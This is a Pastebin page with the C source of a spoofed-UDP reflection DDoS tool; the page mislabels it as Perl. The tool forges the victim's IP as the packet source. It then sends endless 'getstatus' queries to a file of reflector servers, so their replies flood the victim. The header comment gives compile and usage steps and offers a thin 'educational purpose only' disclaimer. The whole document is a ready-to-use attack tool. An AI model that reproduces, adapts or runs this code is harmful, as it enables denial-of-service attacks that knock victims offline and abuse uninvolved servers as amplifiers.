TP2K1

SUDP 50x [Perl]

Jun 24th, 2015
708
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.33 KB | None | 0 0
  1. /*
  2. Spoofed UDP by eKKiM
  3. Educational purpose only please.
  4. --Note by MFJC--
  5. Compile:
  6. apt-get update
  7. apt-get install gcc
  8. gcc udp.c -pthread
  9. Usage: ./a.out ip port time ipfile.txt message
  10. */
  11. #include <stdio.h>
  12. #include <stdlib.h>
  13. #include <netinet/tcp.h>
  14. #include <netinet/udp.h>
  15. #include <netinet/ip.h>
  16. #include <pthread.h>
  17.  
  18. void D(char *message)
  19. {
  20. printf(message);
  21. fflush(stdout);
  22. }
  23.  
  24. typedef struct file_list
  25. {
  26. unsigned long ip;
  27. int port;
  28. };
  29.  
  30. typedef struct pthread_param
  31. {
  32. unsigned long victim_ip;
  33. int victim_port;
  34. struct file_list *list;
  35. int list_size;
  36. char *message;
  37. };
  38.  
  39. typedef struct pseudo_header
  40. {
  41. unsigned int source_address;
  42. unsigned int dest_address;
  43. unsigned char placeholder;
  44. unsigned char protocol;
  45. unsigned short tcp_length;
  46. struct tcphdr tcp;
  47. };
  48.  
  49. void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message)
  50. {
  51. int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP);
  52. char packet[4096];
  53. struct iphdr *iph = (struct iphdr *) packet;
  54. // struct tcphdr *tcph = (struct tcphdr *) (packet + sizeof (struct ip));
  55. struct udphdr *udph = (struct udphdr *) (packet + sizeof(struct ip));
  56. struct sockaddr_in sin;
  57. struct pseudo_header psh;
  58.  
  59. sin.sin_family = AF_INET;
  60. sin.sin_port = htons(destport);
  61. sin.sin_addr.s_addr = destip;
  62.  
  63. memset (packet, 0, 4096);
  64.  
  65. iph->ihl = 5;
  66. iph->version = 4;
  67. iph->tos = 16;
  68. iph->tot_len = sizeof (struct ip) + sizeof (struct udphdr) + strlen(message);
  69. iph->id = htonl (54321);
  70. iph->frag_off = 0;
  71. iph->ttl = 255;
  72. iph->protocol = IPPROTO_UDP;
  73. iph->check = 0;
  74. iph->saddr = srcip;
  75. iph->daddr = sin.sin_addr.s_addr;
  76.  
  77. udph->source = htons(srcport);
  78. // Destination port number
  79. udph->dest = htons(destport);
  80. udph->len = htons(sizeof(struct udphdr));
  81. udph->check = 0; //Kernel fill this in?
  82.  
  83. strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (sizeof (struct udphdr) + sizeof (struct ip)));
  84.  
  85. //IP_HDRINCL needed for own headers
  86. int one = 1;
  87. const int *val = &one;
  88. if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
  89. {
  90. printf ("[x] Cannot set socket options (are we r00t?)\n");
  91. return;
  92. }
  93.  
  94. if (sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
  95. printf ("[x] Error sending packet\n");
  96.  
  97. close(s);
  98. return;
  99. }
  100.  
  101. void *thread_attack(void *thread_params)
  102. {
  103. struct pthread_param *params = thread_params;
  104. int i;
  105.  
  106. while (1)
  107. for (i = 0; i < params->list_size; i++)
  108. attack(params->victim_ip, rand() % 65534 + 1, params->list[i].ip, params->list[i].port, params->message);
  109. // Hmm should we use random port or params->victim_port?
  110. }
  111.  
  112. char *getLine(FILE *f)
  113. {
  114. char *buffer = malloc(sizeof(char));
  115. int pos = 0;
  116. char c;
  117.  
  118. do { // read one line
  119. c = fgetc(f);
  120. if(c != EOF) buffer[pos++] = (char)c;
  121. buffer = (char*)realloc(buffer, sizeof(char) * (pos + 2));
  122. } while (c != EOF && c != '\n');
  123.  
  124. return buffer;
  125. }
  126.  
  127. int main (int argc, char *argv[])
  128. {
  129. struct file_list *list = NULL;
  130. int list_size = 0;
  131.  
  132. struct pthread_param param;
  133. pthread_t udp_attack;
  134.  
  135. printf("Spoofed UDP Attack\n");
  136. printf(" by eKKiM\n");
  137. printf(" for Orgy\n\n");
  138.  
  139. if (argc != 6)
  140. {
  141. printf("Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>\n", argv[0]);
  142. return -1;
  143. }
  144.  
  145. srand(time(0));
  146.  
  147. FILE *pFile = fopen(argv[3], "r");
  148. if (pFile == NULL)
  149. {
  150. printf("[X] Cannot open file\n");
  151. return -1;
  152. }
  153.  
  154. while (!feof(pFile))
  155. {
  156. char *line;
  157. line = getLine(pFile);
  158. char ip[1024];
  159. int port;
  160.  
  161. if (sscanf(line, "%99[^:]:%99d", ip, &port) == 2)
  162. {
  163. list_size++;
  164. list = (struct file_list *) realloc(list, sizeof(struct file_list) * list_size);
  165. list[list_size - 1].ip = inet_addr(ip);
  166. list[list_size - 1].port = port;
  167. }
  168. free(line);
  169. }
  170.  
  171. fclose(pFile);
  172.  
  173. param.victim_ip = inet_addr(argv[1]);
  174. param.victim_port = atoi(argv[2]);
  175.  
  176. param.list = list;
  177. param.list_size = list_size;
  178.  
  179. param.message = "\xFF\xFF\xFF\xFF\x67\x65\x74\x73\x74\x61\x74\x75\x73\x10";
  180.  
  181. pthread_create( &udp_attack, NULL, thread_attack, (void*) &param);
  182.  
  183. printf("[*] Attacking..\n");
  184. sleep(atoi(argv[4]));
  185. printf("[!] Done\n");
  186. return 0;
  187. }
Add Comment
Please, Sign In to add comment